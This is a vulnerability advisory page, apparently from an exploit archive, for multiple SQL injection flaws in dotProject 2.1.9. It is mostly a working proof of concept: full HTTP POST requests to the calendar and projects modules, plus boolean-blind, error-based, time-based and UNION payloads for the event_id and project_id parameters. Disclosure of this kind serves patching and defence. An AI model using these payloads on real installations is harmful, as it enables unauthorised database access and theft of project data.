dotProject 2.1.9 SQL Injection

2019.06.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: dotProject 2.1.9 - Multiple Sql Injection (Poc) # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://dotproject.net # Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip # Version: 2.1.9 # Category: Webapps # Tested on: Xampp for Windows # Software Description : dotProject is a volunteer supported Project Management application. There is no "company" behind this project, it is managed, maintained, developed and supported by a volunteer group and by the users themselves. ================================================================== event_id (POST) - Sql injection PoC POST /dotProject-2.1.9/index.php?m=calendar HTTP/1.1 Host: xxx.xxx.x.xx User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://xxx.xxx.x.xx/dotProject-2.1.9/index.php?m=calendar&a=addedit Content-Type: application/x-www-form-urlencoded Content-Length: 273 Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1 Connection: close Upgrade-Insecure-Requests: 1 dosql=do_event_aed&event_id=0&event_project=[SQLi]&event_assigned=1&event_title=test& event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621& end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on Parameter: event_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dosql=do_event_aed&event_id=0) AND 3236=3236-- rnpG&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: dosql=do_event_aed&event_id=0) AND (SELECT 7581 FROM(SELECT COUNT(*),CONCAT(0x7170787a71,(SELECT (ELT(7581=7581,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bOIA&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: dosql=do_event_aed&event_id=0) AND (SELECT 6637 FROM (SELECT(SLEEP(5)))bNDB)-- NfAk&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: dosql=do_event_aed&event_id=0) UNION ALL SELECT CONCAT(0x7170787a71,0x646772547a6e58774c464e54416963614c64646c7a6f6c745748597350686f535979714443794859,0x71627a6271)-- xXFB&event_project=0&event_assigned=1&event_title=test&event_description=hkffkfuy&event_type=0&event_project=0&event_start_date=20190621&start_time=080000&event_end_date=20190621&end_time=170000&event_recurs=0&event_times_recuring=1&mail_invited=on ================================================================== MULTIPART project_id ((custom) POST) - Sql Injection Poc POST /dotProject-2.1.9/index.php?m=projects HTTP/1.1 Host: 192.168.1.33 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.33/dotProject-2.1.9/index.php?m=projects&a=addedit Content-Type: multipart/form-data; boundary=---------------------------9310663371787104596119761620 Content-Length: 2749 Cookie: dotproject=gfkt21luioqv9eoh25hdaloe7v; client_lang=english; client_login_name=test1 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------9310663371787104596119761620 Content-Disposition: form-data; name="dosql" do_project_aed -----------------------------9310663371787104596119761620 Content-Disposition: form-data; name="project_id" [SQLi] -----------------------------9310663371787104596119761620 Content-Disposition: form-data; name="project_creator" 1 . ..snip ..snip . -----------------------------9310663371787104596119761620 Content-Disposition: form-data; name="import_tasks_from" 0 -----------------------------9310663371787104596119761620 Content-Disposition: form-data; name="project_description" fasdf -----------------------------9310663371787104596119761620-- Parameter: MULTIPART project_id ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: 0 RLIKE (SELECT (CASE WHEN (6146=6146) THEN '' ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: 0 AND EXTRACTVALUE(9751,CONCAT(0x5c,0x716b767871,(SELECT (ELT(9751=9751,1))),0x716b6a6a71)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: 0 AND (SELECT 6725 FROM (SELECT(SLEEP(5)))WETe) # # #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top